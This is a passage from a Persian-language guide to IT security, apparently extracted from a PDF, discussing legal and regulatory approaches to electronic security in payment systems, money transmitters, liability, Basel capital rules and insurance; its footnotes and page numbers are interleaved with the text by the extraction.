‫ﻛﺸﻮﺭﻫﺎﻳﻲ ﺑﻮﺩﻩﺍﻧﺪ ﻛﻪ ﻧﻈﺎﻡ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳـﻲ ﺿـﻌﻴﻔﻲ ﺑـﺮﺍﻱ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺍﺷـﺘﻪﺍﻧـﺪ ﻭ ﻫﻤـﻴﻦ ﺍﻣـﺮ ﺿـﺮﻭﺭﺕ ﻭﺟـﻮﺩ‬
‫ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺭﺍ ﺑـﻴﺶ ﺍﺯ ﭘـﻴﺶ‬
‫ﻧﻤﺎﻳﺎﻥ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻧﺎﺗﻮﺍﻧﻲ ﺩﺭ ﺗﻬﻴﺔ ﮔﺰﺍﺭﺵ ﺍﺯ ﻭﻗﺎﻳﻊ ﺍﻣﻨﻴﺘﻲ ﺑﻮﻳﮋﻩ ﺩﺭ ﺣﻮﺯﺓ ﺧﺪﻣﺎﺕ‬
‫ﻣﺎﻟﻲ ﺑﺮﺍﻱ ﻛﺴﺎﻧﻴﻜﻪ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻲ ﻭ ﭘﻴـﺸﮕﻴﺮﻳﻬﺎﻱ ﻻﺯﻡ‬
‫ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺍﺣﺘﻤﺎﻝ ﺗﺪﺍﻭﻡ ﺑﻴـﺸﺘﺮ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻧﺎﻣﻄﻤﺌﻦ ﻭ ﻧﺎﺩﺭﺳﺖ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺧـﺴﺎﺭﺍﺕ‬
‫ﺑﻴﺸﺘﺮ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ‪ .‬ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﻣﻲﺗﻮﻧﺪ ﺍﻳـﻦ ﺑﺎﺷـﺪ ﻛـﻪ‬
‫ﻭﻇﻴﻔﺔ ﺗﻬﻴﺔ ﮔﺰﺍﺭﺵ ﺍﺯ ﻭﻗﺎﻳﻊ ﺑﺮ ﻋﻬﺪﺓ ﻣﺄﻣﻮﺭﺍﻥ ﺍﺟﺮﺍﻳﻲ ﮔـﺬﺍﺭﺩﻩ‬
‫‪٣٦‬‬
‫ﺷﻮﺩ‪.‬‬
‫ﭘﻴﺸﮕﺎﻣﺎﻥ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺟﺰﺀ ﻣﻬﻤﻲ ﺍﺯ ﻫﺮ ﺳﻴﺴﺘﻢ ﻣﺎﻟﻲ ﻣﺤـﺴﻮﺏ‬
‫ﻣﻲﺷﻮﻧﺪ‪ .‬ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﭘﺮﺩﺍﺧﺖ ﺗﺪﻭﻳﻦ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﺑـﺮﺍﻱ ﭘـﻨﺞ ﻣـﻮﺭﺩ ﺯﻳـﺮ‬
‫ﺭﺍﻩﺣﻠﻲ ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪ‪:‬‬
‫‪.۱‬‬
‫‪.۲‬‬
‫‪.۳‬‬
‫‪.۴‬‬
‫‪.۵‬‬
‫ﺗﻌﺮﻳﻒ ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﮔﺎﻥ ﭘﻮﻝ؛‬
‫ﺍﻟﺰﺍﻣﺎﺕ ﮔﺰﺍﺭﺵﺩﻫﻲ؛‬
‫ﺿﻮﺍﺑﻂ؛‬
‫ﺿﻤﺎﻧﺘﻨﺎﻣﻪﻫﺎ‪ ،‬ﺟﺒﺮﺍﻥ ﺧﺴﺎﺭﺍﺕ‪ ،‬ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ؛ ﻭ‬
‫ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ‪.‬‬
‫ﺿﻤﺎﻧﺘﻨﺎﻣﻪﻫﺎﻱ ﺟﺒﺮﺍﻥ ﺧﺴﺎﺭﺍﺕ‬
‫ﺗﻌﺮﻳﻒ ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﺓ ﭘﻮﻝ‬
‫ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﺓ ﭘﻮﻝ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﻫﺮ ﺳـﺎﺯﻣﺎﻥ ﺗﺠـﺎﺭﻱ ﻛـﻪ ﺩﺭ‬
‫ﺯﻣﻴﻨﺔ ﺍﻧﺘﻘﺎﻝ ﻭ ﺗﺒﺎﺩﻝ ﺍﺭﺯ ﻭ ﻟﻮﺍﺯﻡ ﭘﻮﻟﻲ ﻣﺸﻐﻮﻝ ﻓﻌﺎﻟﻴﺖ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﻻ ﺍﻳﻦ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﻪ "ﺗﺠﺎﺭﺕ ﺧﺪﻣﺎﺕ ﭘﻮﻟﻲ" ﻣﺸﻐﻮﻝ ﻫﺴﺘﻨﺪ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫‪٣٤‬‬
‫ﻭ ﺑﻌﻨــﻮﺍﻥ ﺩﻓــﺎﺗﺮ ﺗــﺴﻮﻳﻪ ﺧﻮﺩﻛــﺎﺭ ﺷــﺨﺺ ﺛﺎﻟــﺚ ﻓﻌﺎﻟﻴــﺖ‬
‫ﻣﻲﻛﻨﻨﺪ‪ ٣٥.‬ﺩﺭ ﺑﺮﺭﺳﻲ ﺍﻣﻨﻴـﺖ ﺳﻴـﺴﺘﻢ ﭘﺮﺩﺍﺧـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬
‫ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﺪﺍﻧﻨﺪ ﻛﻪ ﺍﻟﮕﻮﻳﻲ ﺟﺪﻳﺪ ﺑﺮﺍﻱ ﺟﻨﺒﺶ ﭘﻮﻟﻲ ﺩﺭ‬
‫ﻣﺤﻴﻄﻬﺎﻱ ﭘﻴﭽﻴﺪﺓ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ‪ .‬ﺣﺠـﻢ‬
‫ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﭘﻮﻟﻲ ﻛﻪ ﺑﺠـﺎﻱ ﺩﺍﺧـﻞ ﺑﺎﻧﻜﻬـﺎ ﺩﺭ ﺍﻃـﺮﺍﻑ ﺑﺎﻧﻜﻬـﺎ‬
‫‪Third-Party Automated Clearinghouse‬‬
‫‪۳۵‬‬
‫ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺩﺭﻳﺎﻓﺖ ﻭ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ‪ ،‬ﺗﺒـﺪﻳﻞ‬
‫ﺳﺮﻣﺎﻳﻪ‪ ،‬ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﻣﺸﺎﺑﻪ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ‪.‬‬
‫ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺧـﺪﻣﺎﺕ ﺑﻌـﺪ ﺍﺯ ﻓـﺮﻭﺵ ﻭ ﺟﺒـﺮﺍﻥ‬
‫ﺧﺴﺎﺭﺕ ﺭﺍ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻭ ﺳـﺨﺖﺍﻓـﺰﺍﺭ‬
‫ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﻨﺪ ﺍﻟﺰﺍﻣﻲ ﻧﻤﺎﻳﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﺑـﻪ‬
‫ﻋﺮﺿﺔ ﻣﺤﺼﻮﻻﺗﻲ ﻣﻠﺰﻡ ﻛﻨﻨﺪ ﻛﻪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﺳﻴﺒﻬﺎﻱ ﺍﺣﺘﻤـﺎﻟﻲ‬
‫ﻧﺎﺷﻲ ﺍﺯ ﺭﺧﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻭ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﻣﻘـﺎﻭﻡ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﭼﻨﻴﻦ ﺧﺪﻣﺎﺕ ﻳـﺎ ﻣﺤـﺼﻮﻻﺗﻲ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺣﻔـﺎﻇﺘﻲ‬
‫ﻣﺴﺘﺤﻜﻢﺗﺮﻱ ﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨـﺪ ﻭ ﺧـﻮﺩ ﺭﺍ ﻣﻠـﺰﻡ‬
‫ﻣﻲﺩﺍﻧﻨﺪ ﺫﻛﺮ ﻧﻤﺎﻳﻨﺪ ﻛﻪ ﻣﺤﺼﻮﻟـﺸﺎﻥ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﻳـﻚ‬
‫ﺑﺨﺶ ﺧﺎﺹ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺸﺪﻩ ﻭ ﻳـﺎ ﻣﻨﺎﺳـﺐ ﻧﻴـﺴﺖ‪ .‬ﻳﻜـﻲ ﺍﺯ‬
‫ﺭﺍﻩﺣﻠﻬﺎ ﺑﺮﺍﻱ ﺍﻳﻦ ﻫﻤﺔ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﻗـﺮﺍﺭﺩﺍﺩﻥ ﻳـﻚ ﻳﺎﺩﺩﺍﺷـﺖ‬
‫ﺳﻠﺐ ﻣﺴﺆﻟﻴﺖ‪ ٣٧‬ﺑﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﺎ ﺳﺨﺖﺍﻓـﺰﺍﺭ ﺍﺳـﺖ ﻛـﻪ ﺍﻇﻬـﺎﺭ‬
‫‪34‬‬
‫‪۳۶‬‬
‫ﺧﺼﻮﺻﹰﺎ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ ﻭ ﻣﺪﻳﺮﺍﻥ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‬
‫‪Disclaimer Note‬‬
‫‪37‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺭﻛﻦ ﺩﻭﻡ‪:‬‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ‬
‫ﺵ ﻧﻈﺎﺭﺕ ﻭ ﺍﺟﺮﺍﻱ ﻗـﺎﻧﻮﻥ‬
‫ﻲ ﮔﺴﺘﺮ ﹺ‬
‫ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﭼﮕﻮﻧﮕ ﹺ‬
‫ﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﻮﺟﻪ ﻛﻨﻨﺪ‪ .‬ﺍﻭﻟـﻴﻦ ﺩﻟﻴﻠـﻲ ﻛـﻪ‬
‫ﻞ ﺍﻧﺘﻘﺎ ﹺ‬
‫ﺑﺮﺍﻱ ﻭﺳﺎﻳ ﹺ‬
‫ﺑﻴﺸﺘ ﹺﺮ ﻣﺮﺩﻡ ﺑﺮﺍﻱ ﻋﺪﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻭﺳﺎﻳﻞ ﺍﻧﺘﻘﺎﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ‬
‫ﺁﻥ ﻧﺎﻡ ﻣﻲﺑﺮﻧﺪ ﻫﺮﺍﺱ ﺍﺯ ﺗـﺄﻣﻴﻦﻧﺒـﻮﺩﻥ ﺣﻔﺎﻇـﺖ ﻛـﺎﻓﻲ ﺑـﺮﺍﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺍﺳﺖ‪ .‬ﺣﻔﺎﻇـﺖ ﺻـﺤﻴﺢ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑﺎﻋـﺚ ﺍﻓـﺰﺍﻳﺶ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ﻭ ﺗﻘﻮﻳﺖ ﻧﻈـﻢ ﺑـﺎﺯﺍﺭ ﺷـﻮﺩ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ‬
‫ﺯﻣﻴﻨﻪ ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺑﻴﺸﺘﺮ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻓﺮﺍﻫﻢ ﺳﺎﺯﺩ‪.‬‬
‫‪١٣٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﻲﺩﺍﺭﺩ ﺍﻳﻦ ﻣﺤﺼﻮﻝ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ‪ ،‬ﺍﻧﺘﻘﺎﻝ ﻳﺎ ﺫﺧﻴـﺮﺓ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻏﻴﺮﻣﺠـــﺎﺯ‪ ،‬ﺣـــﺴﺎﺱ ﻳـــﺎ ﻣﺤﺮﻣﺎﻧـــﻪ ﻧﺒﺎﻳـــﺪ ﺑﻜـــﺎﺭ ﺭﻭﺩ ﻭ ﺩﺭ‬
‫ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﻫﻴﭻ ﻣﺴﺌﻮﻟﻴﺘﻲ ﻣﺘﻮﺟـﻪ ﭘﺪﻳﺪﺁﻭﺭﻧـﺪﺓ ﺁﻥ ﻧﺨﻮﺍﻫـﺪ‬
‫ﺑﻮﺩ‪.‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ‬
‫ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﻪ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺴﺒﺖ‬
‫ﺑﻪ ﺗﺄﻣﻴﻦﻛﻨﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺗﻲ ﻛـﻪ ﻣـﺴﺘﻘﻴﻤﹰﺎ ﺑـﺎ ﺍﻳـﻦ ﺻـﻨﻌﺖ ﺩﺭ‬
‫ﺍﺭﺗﺒﺎﻁ ﻧﻴﺴﺘﻨﺪ‪ ،‬ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﺴﺘﺤﻜﻢﺗﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ‪ .‬ﺑـﺎﺭ‬
‫ﺩﻳﮕﺮ ﺗﺄﻛﻴﺪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻢ ﻫﻨﻮﺯ ﺭﺍﻩ ﺯﻳﺎﺩﻱ ﺗـﺎ‬
‫ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺍﻋﺘﻤﺎﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﺭﻛﻦ ﺳﻮﻡ‪:‬‬
‫ﭼﺎﻟﺸﻬﺎﻱ ﻧﻈﺎﺭﺕ ﻭ ﭘﻴﺸﮕﻴﺮﻱ‬
‫ﻧﻴﺎﺯﻫﺎﻱ ﺳﺮﻣﺎﻳﻪﺍﻱ‬
‫ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺟﺪﻳﺪ ﺑﺎﺳﻞ‪ ٣٨‬ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪ ‪ -‬ﺑﻮﻳﮋﻩ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑـﻪ‬
‫ﺗﻬﺪﻳﺪﻫﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﻣﺮﺑﻮﻁ ﻣﻲﺷﻮﻧﺪ ‪ -‬ﺑـﻪ ﻣﺨـﺎﻃﺮﺓ ﺍﺯ ﺩﺳـﺖ‬
‫ﺩﺍﺩﻥ ﺷﻬﺮﺕ ﻳﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺍﺳﺘﺮﺍﺗﮋﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﭙﺮﺩﺍﺧﺘﻪﺍﻧﺪ‪ .‬ﺍﺯ ﺍﻳﻨﺮﻭ ﺍﻳﻦ ﺳﺆﺍﻝ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ ﻛـﻪ‬
‫ﻭﻗﺘﻲ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺩﻗﻴـﻖ ﻧﻴـﺴﺖ ﻭ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺧﺴﺎﺭﺍﺗﻲ ﻛﻪ ﺑﻪ ﺷﻬﺮﺕ ﻭﺍﺭﺩ ﻣـﻲﺷـﻮﺩ ﺳـﺨﺖ ﺍﺳـﺖ‪،‬‬
‫ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﻣﺨﺎﻃﺮﺍﺕ ﻋﻤﻠﻴﺎﺗﻲ ﺑﺎﻧﻜﻲ ﭼﻴـﺴﺖ؟ ﺑـﺎ‬
‫ﺗﻮﺟﻪ ﺑﻪ ﻣﺴﺌﻠﻪ ﺗﻌﻴﻴﻦ ﺳـﺮﻣﺎﻳﺔ ﻻﺯﻡ ﺑـﺮﺍﻱ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴـﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻳﻚ ﺭﻭﺵ ﻣﺆﺛﺮ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺭﻭﻧـﺪ‬
‫ﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺮﻣﻴﻢ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘـ ﹺ‬
‫ﺩﺭ ﻛﻨﺎﺭ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﺑﻴﺸﺘﺮ ﺑﺮﺍﻱ ﺛﺒـﺖ ﮔﺰﺍﺭﺷـﺎﺕ ﭼﻨـﻴﻦ‬
‫ﻭﻗﺎﻳﻌﻲ ﺑﺎﺷﺪ‪ ٣٩.‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻣﻘﺎﻣﺎﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺭﺍﺋﻪﺩﻫﻨـﺪﮔﺎﻥ‬
‫ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺭﺍ ﺑـﻪ ﺑﻴﻤـﻪ ﻛـﺮﺩﻥ ﺧـﻮﺩ ﺩﺭ ﺑﻌـﻀﻲ ﺍﺯ ﺟﻮﺍﻧـﺐ‬
‫‪Basel‬‬
‫‪۳۹‬‬
‫ﻣﺴﺌﻮﻟﻴﺖ‬
‫ﭼﺎﺭﭼﻮﺏ ﺣﻘـﻮﻗﻲ ﻭ ﻗـﺎﻧﻮﻧﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻧﮕﻴـﺰﻩﻫـﺎﻳﻲ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ‪ ،‬ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﺮﻧﺎﻣﻪﻫـﺎ‪ ،‬ﻧـﺮﻡﺍﻓـﺰﺍﺭ‪،‬‬
‫ﺳﺨﺖﺍﻓﺰﺍﺭ ﻭ ﺗﺄﻣﻴﻦﻛﻨﻨﺪﮔﺎﻥ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻳﺠﺎﺩ ﻛﻨـﺪ ﺗـﺎ‬
‫ﺑﻪ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﭘﺎﺳﺨﮕﻮ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻧﻈﺎﺭﺕ ﻭ ﺁﺯﻣﻮﻥ‬
‫ﻋــﻼﻭﻩ ﺑــﺮ ﻛﻨﺘــﺮﻝ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧــﺖ ﻭ ﻧﻈــﺎﺭﺕ ﺑــﺮ‬
‫ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﮔﺎﻥ ﭘﻮﻝ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺻﻼﺡ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﻗـﺎﻧﻮﻧﻲ‪،‬‬
‫ﻧﻈﺎﺭﺕ‪ ،‬ﻭ ﭘﻴـﺸﮕﻴﺮﻱ‪ ،‬ﺑـﺮﺍﻱ ﺗـﻀﻤﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﺭﺍﺋـﻪﺩﻫﻨـﺪﮔﺎﻥ‬
‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻔﻴﺪ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺑـﻮﻳﮋﻩ ﺑـﺮﺍﻱ ﺷـﺮﻛﺘﻬﺎﻱ‬
‫ﺗﺠﺎﺭﻱ ﻛﻪ ﺩﺭ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﺍﺭﺍﺋﻪ ﺳﺎﻳﺮ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﻓﻌﺎﻝ ﻫﺴﺘﻨﺪ ﻣﻄﺮﺡ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﺑﻨﺪ ‪ ۶‬ﻫﻤﻴﻦ ﺧﻼﺻﺔ ﺍﺟﺮﺍﻳﻲ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺩﺭ ﭼﺎﺭﭼﻮﺏ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ‬
‫ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻧﺸﺪﻩﺍﻧـﺪ )ﻣﺜـﻞ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﻳـﺎ ﺳـﺮﻗﺖ ﻫﻮﻳـﺖ(‬
‫ﺗﺮﻏﻴﺐ ﻳـﺎ ﻣﻠـﺰﻡ ﻧﻤﺎﻳﻨـﺪ‪ .‬ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺻـﻨﻌﺖ ﺑﻴﻤـﺔ ﺑﺨـﺶ‬
‫ﺧﺼﻮﺻﻲ ﺩﺭ ﺍﻳﻦ ﺣﻮﺯﻩ ﻓﻌﺎﻟﺘﺮ ﺷﺪﻩ‪ ،‬ﺍﻳﻦ ﺭﻭﺵ ﺑـﻴﺶ ﺍﺯ ﭘـﻴﺶ‬
‫ﻋﻤﻠﻲ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﻪ ﺳـﻼﻣﺖ ﻋﻤـﻮﻣﻲ ﺻـﻨﻌﺖ‬
‫‪٤٠‬‬
‫ﺑﻴﻤﻪ ﻭ ﺳﺎﺧﺘﺎﺭ ﺁﻥ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻣﻨﺠﺮ ﺷﻮﺩ‪.‬‬
‫‪38‬‬
‫ﻛﻤﻴﺘﺔ ﺑﺎﺳﻞ ﺩﺭ ﮔﺮﻭﻩ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ )‪ (EGB‬ﻣﺆﺳـﺴﺔ‬
‫ﻧﻈﺎﺭﺕ ﺑﺎﻧﻜﻲ‪ ٤١‬ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﭘﻴﺸﻨﻬﺎﺩ ﺩﺭ ﺯﻣﻴﻨـﻪ ﺍﻓـﺰﺍﻳﺶ‪ ،‬ﺍﻳﺠـﺎﺩ‬
‫ﺗﻐﻴﻴﺮﺍﺕ ﻳﺎ ﺍﻧﺠﺎﻡ ﺍﺻﻼﺣﺎﺕ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺩﺭ ﻧﻈـﺎﺭﺕ ﻭ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﺟﻬﺖ ﺗﻄﺒﻴﻖ ﺭﻭﺍﻟﻬﺎ ﺑﺎ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳﺪ ﺷﻜﻞ ﮔﺮﻓﺖ‪ .‬ﺩﺭ ﺳـﺎﻝ‬
‫‪ EBG ،۲۰۰۱‬ﺍﺻــﻮﻝ ﻣــﺪﻳﺮﻳﺖ ﻣﺨــﺎﻃﺮﻩ ﺑــﺮﺍﻱ ﺑﺎﻧﻜــﺪﺍﺭﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩ ﻛﻪ ﺷﺎﻣﻞ ﺍﺻـﻮﻝ ﺧﺎﺻـﻲ ﺑـﻮﺩ ﻛـﻪ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ‪ ،‬ﻛﻨﺘﺮﻟﻬـﺎﻱ‬
